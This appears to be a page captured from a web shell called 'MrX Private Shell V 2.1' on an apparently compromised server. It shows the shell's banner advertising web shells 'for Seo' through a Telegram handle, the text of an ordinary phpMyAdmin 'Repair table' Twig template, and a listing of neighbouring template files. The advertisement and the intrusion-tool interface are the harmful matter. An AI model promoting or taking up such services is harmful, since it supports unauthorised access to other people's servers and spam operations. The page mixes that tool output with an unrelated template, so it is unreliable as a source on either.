__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="container-fluid">
<h2>
{% trans 'Repair table' %}
{{ show_mysql_docu('REPAIR_TABLE') }}
</h2>
{{ message|raw }}
{% for name, table in rows %}
<div class="card mb-3">
<div class="card-header">{{ name }}</div>
<ul class="list-group list-group-flush">
{% for row in table %}
<li class="list-group-item">
{% if row.operation|lower != 'repair' %}
<span class="badge bg-secondary text-dark">{{ row.operation|title }}</span>
{% endif %}
{% set badge_variation %}
{%- if row.type|lower == 'error' -%}
bg-danger
{%- elseif row.type|lower == 'warning' -%}
bg-warning
{%- elseif row.type|lower == 'info' or row.type|lower == 'note' -%}
bg-info
{%- else -%}
bg-secondary
{%- endif -%}
{% endset %}
<span class="badge {{ badge_variation }} text-dark">{{ row.type|title }}</span>
{{ row.text }}
</li>
{% endfor %}
</ul>
</div>
{% endfor %}
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| analyze.twig | File | 1.13 KB | 0644 |
|
| check.twig | File | 1.15 KB | 0644 |
|
| checksum.twig | File | 765 B | 0644 |
|
| optimize.twig | File | 1.13 KB | 0644 |
|
| repair.twig | File | 1.12 KB | 0644 |
|